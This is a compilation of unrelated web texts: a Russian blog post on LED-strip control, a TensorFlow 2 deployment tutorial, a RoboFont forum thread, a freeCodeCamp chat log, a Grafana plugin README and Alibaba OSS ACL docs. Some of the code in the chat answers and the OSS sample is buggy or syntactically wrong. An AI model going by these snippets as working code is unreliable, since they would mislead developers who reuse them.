Расширение текущей функциональности для ленты, вытянутой в одну прямую.
Написание пачки алгоритмов под вариант, когда лента сложена в квадрат и прямоугольник:
Управление зажжёной лампочкой
Эквалайзер из центра квадрата
Статичный текст/Бегущая строка
Змейка
что-нибудь ещё. Если будут идеи, пишите, с радостью обсужу и приму к сведению.
Из мелочей, что забыл вовремя написать:
1. Возможно надо корректировать цвет каждого диода перед записью в файл потому, что свет получается «холодный» и отдаёт в синеву при значениях 255-255-255. В Пайтоновском скрипте, что я находил, так и делается:
def correct_pixel_brightness(pixel):
corrected_pixel = bytearray(3)
corrected_pixel[0] = int(pixel[0] / 1.1)
corrected_pixel[1] = int(pixel[1] / 1.1)
corrected_pixel[2] = int(pixel[2] / 1.3)
return corrected_pixel
2. Иконку нарисовал мне тот же человек, что помогал записывать тайм-лапс постройки Лего. В основе неё лежит фотография моей кошки-
3. Описанные действия с файлом
/dev/spidev0.0 работают только для лент с контроллером WS2801. В прошлые выходные подарили на ДР знакомому (necrys) именно ленту, а не гирлянду (на этот раз как раз для эмбилайта), очень надеясь, что там тоже WS2801. Заказывать из Китая времени не было, покупали у нас в городе, продавец утрерждал, что контроллер такой же, хотя никаких надписей на упаковке и самой ленте не было. В самый разгар празднования Дня Рождения решили попробовать подключить. Безуспешно провозившись несколько часов, казалось бы, зная все подводные камни, включить так и не удалось, пока случайно не попробовали поменять протокол на SM16716, после чего она лента зажглась и даже работал chase, но гаснуть всё равно не хотела. Написание простой с-программы вопрос не решил, попытка записи массива по 3 байта зажигала такие участки ленты, что логику работы в тот день нам понять не удалось. После экспериментов, к середине следующего дня, новому обладателю ленты удалось таки раскурить-понять алгоритм работы с лентой: в файл нужно писать массив по 4 байта на светящуюся единицу, где первый байт должен быть всегда 0xFF, а остальные уже RGB. Изменение значения первого байта ведут к поведению ленты, смысл которого пока понять не удаётся. Именно в виду разницы контроллера, сборка и патчинг boblight, который с ним работал бы корректно и соединить его xbmc заняло несколько дней. Но после результат был достигнут:
За код просьба сильно не пинать, опыта написания больших проектов, к сожалению, пока не имею, да и когда начинал писать код, не думал, что вырастет до такого. А ещё это первый опыт работы с Гитом и выкладка своего кода в Open-Source.
Спасибо, надеюсь было интересно.
|
April 10, 2020 — Posted by Sara Robinson, Developer Advocate
Google Cloud’s AI Platform recently added support for deploying TensorFlow 2 models. This lets you scalably serve predictions to end users without having to manage your own infrastructure. In this post, I’ll walk you through the process of deploying two different types of TF2 models to AI Platform and use them to generate predictions with the AI Platfo…
probability_model created at the end of this notebook, since it outputs classifications in a more human-readable format. The output of probability_model is a 10-element softmax array with the probabilities that the given image belongs to each class. Since it’s a softmax array, all of the elements add up to 1. The highest-confidence classification will be the item of clothing corresponding with the index with the highest value.
from google.colab import auth
auth.authenticate_user()
Then run the following, replacing “your-project-id-here” with the ID of the Cloud project you created:
CLOUD_PROJECT = 'your-project-id-here'
BUCKET = 'gs://' + CLOUD_PROJECT + '-tf2-models'
For the next few code snippets, we’ll be using gcloud: the Google Cloud CLI along with gsutil, the CLI for interacting with Google Cloud Storage. Run the line below to configure gcloud with the project you created:
!gcloud config set project $CLOUD_PROJECTIn the next step, we’ll create a Cloud Storage bucket and print our GCS bucket URL. This will be used to store your saved model. You only need to run this cell once:
!gsutil mb $BUCKET
print(BUCKET)
Cloud AI Platform expects our model in TensorFlow 2 SavedModel format. To export our model in this format to the bucket we just created, we can run the following command. The
model.save() method accepts a GCS bucket URL. We’ll save our model assets into a fashion-mnist subdirectory:
probability_model.save(BUCKET + '/fashion-mnist', save_format='tf')
To verify that this exported to your storage bucket correctly, navigate to your bucket in the Cloud Console (visit storage -> browser). You should see something like this:
MODEL = 'fashion_mnist'
!gcloud ai-platform models create $MODEL --regions=us-central1
Once this runs, you should see the model in the Models section of the AI Platform Cloud Console:
VERSION = 'v1'
MODEL_DIR = BUCKET + '/fashion-mnist'
Finally, run this gcloud command to deploy the model:
!gcloud ai-platform versions create $VERSION \
--model $MODEL \
--origin $MODEL_DIR \
--runtime-version=2.1 \
--framework='tensorflow' \
--python-version=3.7
This command may take a minute to complete. When your model version is ready, you should see the following in the Cloud Console:
import googleapiclient.discovery
def predict_json(project, model, instances, version=None):
service = googleapiclient.discovery.build('ml', 'v1')
name = 'projects/{}/models/{}'.format(project, model)
if version is not None:
name += '/versions/{}'.format(version)
response = service.projects().predict(
name=name,
body={'instances': instances}
).execute()
if 'error' in response:
raise RuntimeError(response['error'])
return response['predictions']
test_predictions = predict_json(CLOUD_PROJECT, MODEL, test_images[:2].tolist())
In the response, you should see a JSON object with softmax as the key, and a 10-element
softmax probability list as the value. We can get the predicted class of the first test image by running:
np.argmax(test_predictions[0]['softmax'])
Our model predicts class 9 for this image with 98% confidence. If we look at the beginning of the notebook, we’ll see that 9 corresponds with ankle boot. Let’s plot the image to verify our model predicted correctly. Looks good!
plt.figure()
plt.imshow(test_images[0])
plt.colorbar()
plt.grid(False)
plt.show()
feature_columns. This is the input format our model is expecting, which will come in handy after we deploy it. In addition to sending features as tensors, we can also send them to our deployed model as lists. Note that this model has a mix of numerical and categorical features. One of the categorical features (thal) should be passed in as a string; the rest are either integers or floats.hd-prediction subdirectory:
model.save(BUCKET + '/hd-prediction', save_format='tf')
Verify that the model assets were uploaded to your bucket. Since we showed how to deploy models with gcloud in the previous section, here we’ll use the Cloud Console. Start by selecting
Head over to the models section of your Cloud console. Then select the New model button and give your model a name, like hd_prediction and select Create.
Once your model resource has been created, select
New version. Give it a name (like v1), then select the most recent Python version (3.7 at the time of this writing). Under frameworks select TensorFlow with Framework version 2.1 and ML runtime version 2.1. In Model URL, enter the Cloud Storage URL where you uploaded your TF SavedModel earlier. This should be equivalent to BUCKET + '/hd-prediction' if you followed the steps above. Then select Save, and when your model is finished deploying you’ll see a green checkmark next to the version name in your console.
# First remove the label column
test = test.pop('target')
caip_instances = []
test_vals = test[:2].values
for i in test_vals:
example_dict = {k: [v] for k,v in zip(test.columns, i)}
caip_instances.append(example_dict)
Here’s what the resulting array of
caip_instances looks like:
[{'age': [60],
'ca': [2],
'chol': [293],
'cp': [4],
'exang': [0],
'fbs': [0],
'oldpeak': [1.2],
'restecg': [2],
'sex': [1],
'slope': [2],
'thal': ['reversible'],
'thalach': [170],
'trestbps': [140]},
...]
We can now call the same
predict_json method we defined above, passing it our new model and test instances:
test_predictions = predict_json(CLOUD_PROJECT, 'hd_prediction', caip_instances)
[{'output_1': [-1.4717596769332886]}, {'output_1': [-0.2714746594429016]}]
Note that if you’d like to change the name of the output tensor (currently
output_1), you can add a name parameter when you define your Keras model in the tutorial above:
layers.Dense(1, name='prediction_probability')
In addition to making predictions with the API, you can also make prediction requests with gcloud. All of the prediction requests we’ve made so far have used online prediction, but AI Platform also supports batch prediction for large offline jobs. To create a batch prediction job, you can make a JSON file of your test instances and kick off the job with gcloud. You can read more about batch prediction here.
April 10, 2020 — Posted by Sara Robinson, Developer Advocate
Google Cloud’s AI Platform recently added support for deploying TensorFlow 2 models. This lets you scalably serve predictions to end users without having to manage your own infrastructure. In this post, I’ll walk you through the process of deploying two different types of TF2 models to AI Platform and use them to generate predictions with the AI Platfo…
|
RFont subclass not generating "otf"
RicardGarcialast edited by gferreira
Hello,
I'm working on a set of animations that are going to use some .ufos I have and I'm facing a problem that I don't know how to solve. The point is that I want to generate otf files out of them while using
generateto the Font object but it saysThe RFont subclass does not implement this method. Any idea what I'm doing wrong?
Here's a simplyfied version of the code that returns this error:
from fontParts.world import NewFont, OpenFont
ufos = ['Patufet-Black.ufo', 'Patufet-Light.ufo']
new_f = OpenFont(ufos[0], showInterface=False)
print(new_f)
new_f.generate("otfcff", "_Install-otf/new_f.otf")
Thanks.
Inside the app DrawBot an
RFonthas no implementation for the methodgenerate.
Inside RoboFont you can use the DrawBot extension, where you can have all the powers DrawBot has to draw and all the powers RoboFont has to edit font data, and also call
font.generate(...).
RicardGarcialast edited by RicardGarcia
I see. Then, if I want to make an animation with a long text interpolating between two .ufo files, which would be the the best option? Generating a .designspace with an axis, export the .otf and use it in the script?
For what you say, it looks doable also inside Robofont itself, though.
Thanks!
gferreiralast edited by
hello @RicardGarcia,
for a simple interpolation between two masters you can use
font.interpolate(factor, font1, font2)â see this example script.
hope this helps!
there are several options:
font.interpolatewill returns a ufo
a designspace document with a given location will also returns a ufo, use mutatorMath
generate a variable font
Generating variable fonts from design spaces is not difficult: in RoboFont you can use the Batch extension. In DrawBot you can pip install
ufo2ftto generate a var font and use it inside your type setting.
good luck!
RicardGarcialast edited by
Thank you so much for your help to both of you. @gferreira, the example you linked is super helpful and clear. I've read a bunch of code samples in Robofont's website and I don't know why I didn't run into this one. @frederik, thanks! I think that the main thing I was doing wrong was doing it outside Robofont. With the hints you both gave me I can manage to do what I wanted inside Robofont.
Thanks!
RicardGarcialast edited by RicardGarcia
Hi again. Even though both of your comments helped me a lot I'm still facing a last problem that I don't know how to solve.
From my opened ufos, I'm generating a new interpolated font that I'm using in each frame to make an animation. The point is that, if I'm writting the
factorright away like0,.25or1it does the correct interpolation but it doesn't if I use the variableinterp_factor. Is it something about overwritting thenew_f.otffile?
I've tried to clean the code as much as possible and hope that helps others pointing out what's going on here:
text2Use = """
A monospaced font, also called a fixed-pitch, fixed-width, or non-proportional font, is a font whose letters and characters each occupy the same amount of horizontal space.
"""
def animationInstagram(text = text2Use):
# Size of the page in px
w, h = 1200, 2134.4
# Number of frames
frames = 4
# Step factor
maxFactor = 1
stepFactor = maxFactor / (frames)
# Interpolation factor (starting point)
interp_factor = 1
#Accessing opened ufos
f1, f2 = AllFonts()[0], AllFonts()[1]
f1.generate("otfcff", "f1.otf")
f_1 = OpenFont("f1.otf", showInterface=False)
f2.generate("otfcff", "f2.otf")
f_2 = OpenFont("f2.otf", showInterface=False)
# Frames
for f in range(frames):
# Page settings
newPage( w , h )
fill(0) # BG
rect(0,0,w,h)
fill(1) # FG
# Creating font to interpolate
new_f = NewFont(showInterface=False)
new_f.interpolate(interp_factor, f_1, f_2, round=False)
print("Interpolation factor: ", interp_factor)
new_f.generate("otfcff", "new_f.otf")
#Installing the interpolated (temporary) font
fontName = installFont("new_f.otf")
# ------------------
# Text box
extraSpace = -200
boxX, boxY, boxW, boxH = extraSpace, extraSpace, w-extraSpace*2.7, h-extraSpace*2
font(fontName, 100)
textBox(text, (boxX, boxY, boxW, boxH), align="left")
# ------------------
# Subtracting step factor
interp_factor -= stepFactor
# Uninstalling
uninstallFont("new_f.otf")
# Calling the function
animationInstagram()
# Saving the image
saveImage("Test-interpolation.gif")
Thank you so much once again!
two things:
why generate a binary and read the the binary back in? see
f1.generate("otfcff", "f1.otf")
Give you new font a unique name based on the
interp_factor. The fontfamilyNameandstyleNamemakes up thepostScriptNamewhich has to be unique to set a font in drawBot (and everywhere else). In your case the font familyName and styleName will be "None" "None". This is not good...
RicardGarcialast edited by
Hi, @frederik:
why generate a binary and read the the binary back in? see f1.generate("otfcff", "f1.otf")
You mean I can use the opened ufo files right away as
f1andf2to interpolate with, right?
Give you new font a unique name based on the interp_factor. The font familyName and styleName makes up the postScriptName which has to be unique to set a font in drawBot (and everywhere else). In your case the font familyName and styleName will be "None" "None". This is not good...
All right. I thought that after uninstalling the interpolated font I could generate another one I could use in the new page afterwards. So, in this case, would it make sense to set the same name for familyName while the
styleNamecould be related toinerp_factoras you say?
|
@Botenga delete this code you have at the end of your html:
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<link rel="stylesheet" type="text/css" href="bootstrap.css">
</body>
and it should work now
https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1 without the jquery.min.js part
botenga sends brownie points to @sorinr :sparkles: :thumbsup: :sparkles:
html-joe sends brownie points to @sorinr :sparkles: :thumbsup: :sparkles:
var img = document.createElement('img')
img.src = stringified.weather[0].icon
hoxtygen sends brownie points to @mot01 :sparkles: :thumbsup: :sparkles:
document.getElementById('image-container').innerHTML = "<img src = "+stringified.weather[0].icon+">";
hoxtygen sends brownie points to @sorinr and @mot01 :sparkles: :thumbsup: :sparkles:
await try{this.getStreamData()}.catch(error){console.log(error)}; didn't work out when I made getStreamData async. Here's my pen:
primuscovenant sends brownie points to @heroiczero :sparkles: :thumbsup: :sparkles:
catherinewoodward sends brownie points to @terensu-desu :sparkles: :thumbsup: :sparkles:
<html>, <body> sections in them - that is provided by the template. animate.css you can paste it into the resource boxes directly, or they have "quick adds" and a way to search for the package that you want. CodePen is a nice useful site - just remember to stick with "Pen" items for your pages, as a free user (unless you've paid) you only have one "Project". I don't think that there is a limit to the number of "Pen" items? I have seen people get confused by the fact that they can only have one "project"... maybe that will be helpful to be aware of that.
@terensu-desu Sure!
<html>
<head>
<script type="text/javascript" src="https://safi.me.uk/typewriterjs/js/typewriter.js"></script>
<script>
var app = document.getElementById('app');
var typewriter = new Typewriter(app, {
loop: true
});
typewriter.typeString('Hello World!')
.pauseFor(2500)
.deleteAll()
.typeString('Strings can be removed')
.pauseFor(2500)
.deleteChars(7)
.typeString('altered!')
.start();
</script>
</head>
<body>
<div id="app"></div>
</body>
</html>
This is my code currently. Nothing shows when I run it. Just a blank page!
indikoro sends brownie points to @khaduch :sparkles: :thumbsup: :sparkles:
<script> element to the end just before the </body> closing tag. That will insure that the page is loaded before it tries to run the JS. $(document).wait()
hi can someone tell me how to fix this issue
i have setup a fixed navbar , the issue is the banner goes below the navbar
how to get the banner to showup after the navbar?
sorry reycuban, you can't send brownie points to yourself! :sparkles: :sparkles:
reycuban sends brownie points to @tiagocorreiaalmeida :sparkles: :thumbsup: :sparkles:
its not actually, error . but when i trying to post the data and getting back the data its actually working good . but when ever i reload the page the data's i got by the server and displayed in browser is actually removed , why?additional info'
robomongo is not supported for my system
so i cant able to seet the data stored or not!
my system is 32bit os!
its not actually, error . but when i trying to post the data and getting back the data its actually working good . but when ever i reload the page the data's i got by the server and displayed in browser is actually removed , why?additional info'
robomongo is not supported for my system
so i cant able to seet the data stored or not!
my system is 32bit os!this is the problem.
const express = require('express');
const router = express.Router();
const cricketModel = require('../model/score');
router.get('/api/maxi',function(req,res){
res.send({"type" : "get"});
});
router.post('/api/maxi/',function(req,res){
cricketModel.create(req.body).then(function(data){
res.send(data);
console.log(data);
}).catch(err => console.error(err) && res.status(400).send(err));
});
router.delete('/api/maxi/:id',function(req,res){
res.send({"type" : "delete"});
});
router.put('/api/maxi/:id',function(req,res){
res.send({"type" : "update"});
});
module.exports = router;
const express = require('express');
const router = require('./api/router.js');
const bodyParser = require('body-parser');
const mongoose = require('mongoose');
const app = express();
mongoose.connect("mongodb://localhost/gomaxi");
mongoose.Promise = global.Promise;
app.use(express.static('public'));
app.use(bodyParser.json());
app.use(router);
app.listen(4000,function(){
console.log("server is listening for the request on port 4000 , hurray !");
});
its not actually, error . but when i trying to post the data and getting back the data its actually working good . but when ever i reload the page the data's i got by the server and displayed in browser is actually removed , why?
note :
robomongo is not supported for my system
so i cant able to seet the data stored or not!
my system is 32bit os!
data back
router.get('/api/maxi',function(req,res){
console.log('1');
res.send({"type" : "get"});
});
router.post('/api/maxi/',function(req,res){
console.log('2')
cricketModel.create(req.body).then(function(data){
res.send(data);
console.log(data);
}).catch(err => console.error(err) && res.status(400).send(err));
});
router.delete('/api/maxi/:id',function(req,res){
res.send({"type" : "delete"});
});
router.put('/api/maxi/:id',function(req,res){
res.send({"type" : "update"});
});
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>maxi</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
</head>
<body>
<input id="search1" placeholder="enter playername">
<input id="search2" placeholder="enter playerscore">
<button class="btn-primary">click</button>
<div class="well"></div>
</body>
<script>
$(document).ready(function(){
$(".btn-primary").click(function(){
console.log("click");
var obj = {
"player" : $("#search1").val(),
"score" : $("#search2").val()
};
$.ajax({
type : "POST",
url : "http://localhost:4000/api/maxi/",
contentType : "application/json",
data : JSON.stringify(obj),
success : function(data){
console.log(data);
$(".well").append("<h1>"+data.player + data.score+"</h1>");
},
error : function(err){
console.log('error' ,err);
},
dataType : "json"
});
});
});
</script>
</html>
```router.post('/', function (req, res, next) {
var user = new User({
firstName: req.body.firstName,
lastName: req.body.lastName,
password: bcrypt.hashSync(req.body.password, 10),
email: req.body.email
});
user.save(function(err, result) {
if (err) {
// If there is an error, return from this function immediately with
// the error code
return res.status(500).json({
title: 'An error occurred',
error: err
});
}
res.status(201).json({
message: 'Saved User',
obj: result
});
});
});```
const express = require('express');
const router = express.Router();
const cricketModel = require('../model/score');
router.get('/api/maxi',function(req,res){
res.send({"type" : "get"});
});
router.post('/api/maxi/',function(req,res){
console.log("2");
cricketModel(req.body).save().then(function(data){
res.send(data);
console.log(data);
}).catch(err => console.error(err) && res.status(400).send(err));
});
router.delete('/api/maxi/:id',function(req,res){
res.send({"type" : "delete"});
});
router.put('/api/maxi/:id',function(req,res){
res.send({"type" : "update"});
});
module.exports = router;
@1532j0004kg how about ```router.post('/api/maxi/', function (req, res, next) {
console.log('2');
console.log(body);
cricketModel.save(function (err, result) {
if (err) {
// If there is an error, return from this function immediately with
// the error code
return res.status(500).json({
title: 'An error occurred',
error: err
});
}
res.status(201).json({
message: 'Saved User',
obj: result
});
});
```
```router.post('/api/maxi/', function (req, res, next) {
console.log('2');
console.log(body);
cricketModel.save(function (err, result) {
if (err) {
// If there is an error, return from this function immediately with
// the error code
return res.status(500).json({
title: 'An error occurred',
error: err
});
}
res.status(201).json({
message: 'Saved User',
obj: result
});
});
```
```router.post('/api/maxi/', function (req, res, next) {
console.log('2');
console.log(body);
cricketModel.save(function (err, result) {
if (err) {
// If there is an error, return from this function immediately with
// the error code
return res.status(500).json({
title: 'An error occurred',
error: err
});
}
res.status(201).json({
message: 'Saved User',
obj: result
});
});
```
router.post('/api/maxi/', function (req, res, next) {
console.log('2');
console.log(body);
cricketModel.save(function (err, result) {
if (err) {
// If there is an error, return from this function immediately with
// the error code
return res.status(500).json({
title: 'An error occurred',
error: err
});
}
res.status(201).json({
message: 'Saved User',
obj: result
});
});
Mongoose: scores.insert({ player: 'q1', score: 1, _id: ObjectId("5a47bd6590f3561
5fc1c5ffe"), __v: 0 })
{ __v: 0, player: 'q1', score: 1, _id: 5a47bd6590f35615fc1c5ffe }
2
Mongoose: scores.insert({ player: 'q1w2', score: 1, _id: ObjectId("5a47bd6c90f35
615fc1c5fff"), __v: 0 })
{ __v: 0,
player: 'q1w2',
score: 1,
_id: 5a47bd6c90f35615fc1c5fff }
2
Mongoose: scores.insert({ player: 'q1w2as', score: 1, _id: ObjectId("5a47bd7390f
35615fc1c6000"), __v: 0 })
{ __v: 0,
player: 'q1w2as',
score: 1,
_id: 5a47bd7390f35615fc1c6000 }
```router.post('/api/maxi/', function (req, res, next) {
console.log('2');
console.log(body);
var cricketModel = new CricketModel({
firstField: req.body.firstField, // Your model fields here
lastField: req.body.lastField,
});
cricketModel.save(function (err, result) {
if (err) {
// If there is an error, return from this function immediately with
// the error code
return res.status(500).json({
title: 'An error occurred',
error: err
});
}
res.status(201).json({
message: 'Saved User',
obj: result
});
});
});```
```router.post('/api/maxi/', function (req, res, next) {
console.log('2');
console.log(body);
var cricketModel = new CricketModel({
firstField: req.body.firstField, // Your model fields here
lastField: req.body.lastField,
});
cricketModel.save(function (err, result) {
if (err) {
// If there is an error, return from this function immediately with
// the error code
return res.status(500).json({
title: 'An error occurred',
error: err
});
}
res.status(201).json({
message: 'Saved User',
obj: result
});
});
});```
Mongoose: scores.insert({ player: 'q1', score: 1, _id: ObjectId("5a47bd6590f3561
5fc1c5ffe"), __v: 0 })
{ __v: 0, player: 'q1', score: 1, _id: 5a47bd6590f35615fc1c5ffe }
2
Mongoose: scores.insert({ player: 'q1w2', score: 1, _id: ObjectId("5a47bd6c90f35
615fc1c5fff"), __v: 0 })
{ __v: 0,
player: 'q1w2',
score: 1,
_id: 5a47bd6c90f35615fc1c5fff }
2
Mongoose: scores.insert({ player: 'q1w2as', score: 1, _id: ObjectId("5a47bd7390f
35615fc1c6000"), __v: 0 })
{ __v: 0,
player: 'q1w2as',
score: 1,
_id: 5a47bd7390f35615fc1c6000 }
C:\Users\dinesh\Desktop\app1>scores.find();
'scores.find' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\dinesh\Desktop\app1>mongo.exe'mongo.exe' is not recognized as an internal or external command,operable program or batch file.C:\Users\dinesh\Desktop\app1>start mongo.exeThe system cannot find the file mongo.exe.
C:\database_mongo\mongodb-win32-i386-3.2.18-4-g752daa3\bin>
> scores.find();
2017-12-30T08:49:19.995-0800 E QUERY [thread1] ReferenceError: scores is not
defined :
@(shell):1:1
C:\database_mongo\mongodb-win32-i386-3.2.18-4-g752daa3\bin>mongo
2017-12-30T08:50:02.775-0800 I CONTROL [main] Hotfix KB2731284 or later update
is not installed, will zero-out data files
MongoDB shell version: 3.2.18-4-g752daa3
connecting to: test
Server has startup warnings:
2017-12-30T06:55:07.242-0800 I CONTROL [initandlisten]
2017-12-30T06:55:07.242-0800 I CONTROL [initandlisten] ** WARNING: This 32-bit
MongoDB binary is deprecated
2017-12-30T06:55:07.243-0800 I CONTROL [initandlisten]
2017-12-30T06:55:07.244-0800 I CONTROL [initandlisten]
2017-12-30T06:55:07.245-0800 I CONTROL [initandlisten] ** NOTE: This is a 32 bi
t MongoDB binary.
2017-12-30T06:55:07.270-0800 I CONTROL [initandlisten] ** 32 bit builds a
re limited to less than 2GB of data (or less with --journal).
2017-12-30T06:55:07.271-0800 I CONTROL [initandlisten] ** Note that journ
aling defaults to off for 32 bit and is currently off.
2017-12-30T06:55:07.272-0800 I CONTROL [initandlisten] ** See http://doch
ub.mongodb.org/core/32bit
2017-12-30T06:55:07.274-0800 I CONTROL [initandlisten]
>
> use database
switched to db database
> scores.find()
2017-12-30T08:52:26.512-0800 E QUERY [thread1] ReferenceError: scores is not
defined :
@(shell):1:1
> collections.find()
2017-12-30T08:52:36.159-0800 E QUERY [thread1] ReferenceError: collections is
not defined :
@(shell):1:1
C:\database_mongo\mongodb-win32-i386-3.2.18-4-g752daa3\bin>mongo
2017-12-30T08:50:02.775-0800 I CONTROL [main] Hotfix KB2731284 or later update
is not installed, will zero-out data files
MongoDB shell version: 3.2.18-4-g752daa3
connecting to: test
Server has startup warnings:
2017-12-30T06:55:07.242-0800 I CONTROL [initandlisten]
2017-12-30T06:55:07.242-0800 I CONTROL [initandlisten] ** WARNING: This 32-bit
MongoDB binary is deprecated
2017-12-30T06:55:07.243-0800 I CONTROL [initandlisten]
2017-12-30T06:55:07.244-0800 I CONTROL [initandlisten]
2017-12-30T06:55:07.245-0800 I CONTROL [initandlisten] ** NOTE: This is a 32 bi
t MongoDB binary.
2017-12-30T06:55:07.270-0800 I CONTROL [initandlisten] ** 32 bit builds a
re limited to less than 2GB of data (or less with --journal).
2017-12-30T06:55:07.271-0800 I CONTROL [initandlisten] ** Note that journ
aling defaults to off for 32 bit and is currently off.
2017-12-30T06:55:07.272-0800 I CONTROL [initandlisten] ** See http://doch
ub.mongodb.org/core/32bit
2017-12-30T06:55:07.274-0800 I CONTROL [initandlisten]
>
C:\mongodbs
C:\database_mongo\mongodb-win32-i386-3.2.18-4-g752daa3\bin>mongod --dbpath C:\mongodbs
C:\database_mongo\mongodb-win32-i386-3.2.18-4-g752daa3\bin>mongo
C:\database_mongo\mongodb-win32-i386-3.2.18-4-g752daa3\bin>mongod --dbpath C:\mo
ngodbs
2017-12-30T08:59:19.588-0800 I CONTROL [main]
2017-12-30T08:59:19.592-0800 W CONTROL [main] 32-bit servers don't have journal
ing enabled by default. Please use --journal if you want durability.
2017-12-30T08:59:19.593-0800 I CONTROL [main]
2017-12-30T08:59:19.602-0800 I CONTROL [main] Hotfix KB2731284 or later update
is not installed, will zero-out data files
2017-12-30T08:59:19.611-0800 I CONTROL [initandlisten] MongoDB starting : pid=3
544 port=27017 dbpath=C:\mongodbs 32-bit host=dinesh007
2017-12-30T08:59:19.614-0800 I CONTROL [initandlisten] targetMinOS: Windows Vis
ta/Windows Server 2008
2017-12-30T08:59:19.615-0800 I CONTROL [initandlisten] db version v3.2.18-4-g75
2daa3
2017-12-30T08:59:19.617-0800 I CONTROL [initandlisten] git version: 752daa30609
5fb1610bb5db13b7b106ac87ec6cb
2017-12-30T08:59:19.618-0800 I CONTROL [initandlisten] allocator: tcmalloc
2017-12-30T08:59:19.619-0800 I CONTROL [initandlisten] modules: none
2017-12-30T08:59:19.622-0800 I CONTROL [initandlisten] build environment:
2017-12-30T08:59:19.623-0800 I CONTROL [initandlisten] distarch: i386
2017-12-30T08:59:19.624-0800 I CONTROL [initandlisten] target_arch: i386
2017-12-30T08:59:19.625-0800 I CONTROL [initandlisten] options: { storage: { db
Path: "C:\mongodbs" } }
2017-12-30T08:59:19.632-0800 E NETWORK [initandlisten] listen(): bind() failed
errno:10048 Only one usage of each socket address (protocol/network address/port
) is normally permitted. for socket: 0.0.0.0:27017
2017-12-30T08:59:19.633-0800 E STORAGE [initandlisten] Failed to set up sockets
during startup.
2017-12-30T08:59:19.635-0800 I CONTROL [initandlisten] dbexit: rc: 48
omgmerrickd sends brownie points to @vasejs and @import :sparkles: :thumbsup: :sparkles:
function palindrome(str) {var x = str.split('').reverse().join('');var y = x.replace(/[\W_]/g, '');var palindr = y.toLowerCase();if ( palindr == str){return true;}else {return false;}
}
palindrome("eye");
sorry vasejs, you can't send brownie points to yourself! :sparkles: :sparkles:
``` function palindrome(str) {
var x = str.split('').reverse().join('');
var y = x.replace(/[\W_]/g, '');
var palindr = y.toLowerCase();
if ( palindr == str){
return true;
}
else {
return false;
}
}
palindrome("eye"); ```
sakisbal sends brownie points to @vasejs :sparkles: :thumbsup: :sparkles:
function palindrome(str) {
var x = str.split('').reverse().join('');
var y = x.replace(/[\W_]/g, '');
var palindr = y.toLowerCase();
if ( palindr == str){
return true;
}
else {
return false;
}
}
palindrome("eye");
return str.replace(/[\W_]/g, '').toLowerCase()=== str.replace(/[\W_]/g, '').toLowerCase().split('').reverse().join('');
|
Grafana Parity Report
A parity report panel for Grafana.
Overview
This panel shows a parity report for multiple series. A report is represented as a table with rows. Each row shows a custom check expressed as an equation having the series data reduced to a representative value by means of mathjs functions along with two extra functions supported by this plugin, namely:
# gives the first datapoint in the series
first()
# gives the last datapoint in the series
last()
Each of these functions takes an alias name genereated by the 'alias()' graphite function for queries under the metrics tab. An example of queries having aliases as A, B and C is shown below:
alias(test.network.toplevel.traffic.incoming.rate, 'A')
alias(test.network.toplevel.traffic.outgoing.route1.rate, 'B')
alias(test.network.toplevel.traffic.outgoing.route2.rate, 'C')
By default the plugin looks for "target" as the key in the JSON response but it can be changed through the Alias Key field under the options tab. The JSON response from the datasource should be of the following format (with "target" or some other key specified through Alias Key field)
[
{
"target":"A",
"datapoints":[
[100,1450754160000],
[102,1450754210000],
...
]
},
{
"target":"B",
"datapoints":[
[50,1450754160000],
[52,1450754210000],
...
]
},
...
]
These queries can then be used in the custom checks expressed as equations and referred by their aliases A, B and C.
max(A) + min(B) = mean(C) * 2
sum(B) / first(A) * 5 = last(C)
first(A) + var(B) = first(B) + std(C)
derivative("x^2", "x").eval({x: mean(A)}) = hypot(C)
On defining equations like above one can set multiple thresholds on accepted percentage difference between LHS and RHS of the equation, the breach of which can be shown in the parity report table as different colors set against the thresholds. The report also shows the percentage difference with configurable precision.
THE NAME OF THE ALIASES SHOULD BE VALID JAVASCRIPT VARIABLES NAMES
Compatibility
This panel should work will work with Graphite.
Development
Docker is an easy way to spin-up an instance of Grafana. With docker installed, run the following command in the directory containing the plugin; this will expose the local plugin on your machine to the Grafana container so you can test it out.
docker run -it -v $PWD:/var/lib/grafana/plugins/parity_report -p 3000:3000 --name grafana.docker grafana/grafana
Now do this...
# Install development packages
npm install
# Install the grunt-cli
sudo npm install -g grunt-cli
# Compile into dist/
grunt
# Restart Grafana to see it
docker restart grafana.docker
# Watch for changes (requires refresh)
grunt watch
Use grunt test to run the Jasmine tests for the plugin; and grunt eslint to check for style issues. Note that the plugin controller isn't tested because it depends on Grafana native libraries, which aren't available outside of Grafana.
Contributing
For bugs and new features, open an issue and we'll take a look. If you want to contribute to the plugin, you're welcome to submit a pull request - just make sure grunt runs without errors first.
|
This topic describes how to manage the ACLs for objects in a bucket with versioning enabled or suspended.
Set the ACL for an object
PutObjectACL sets the ACL for the current version of the target object by default. If the current version of the target object is a delete marker, the 404 Not Found error is returned. You can set the versionId in the request to set the ACL for a specified version of the target object.
# -*- coding: utf-8 -*-
import oss2
# It is highly risky to log on with the AccessKey of an Alibaba Cloud account because the account has permissions on all the APIs in OSS. We recommend that you log on as a RAM user to access APIs or perform routine operations and maintenance. To create a RAM user account, log on to https://ram.console.aliyun.com.
auth = oss2.Auth('<yourAccessKeyId>', '<yourAccessKeySecret>')
# This example uses the China East 1 (Hangzhou) endpoint. Specify the actual endpoint based on your requirements.
bucket = oss2.Bucket(auth, 'http://oss-cn-hangzhou.aliyuncs.com', '<yourBucketName>')
# Sets the ACL for a specified version of the object. In this example, the ACL for the object is modified to public-read.
params = dict()
params['versionId'] = '<yourObjectVersionId>'
result = bucket.put_object_acl(<'yourObjectName'>, oss2.OBJECT_ACL_PUBLIC_READ, params = params)
# Views the version ID of the object for which the ACL is modified.
print('set acl object versionid:', result.versionid)
For more information about setting the ACL for an object, see PutObjectACL.
Obtain the ACL for an object
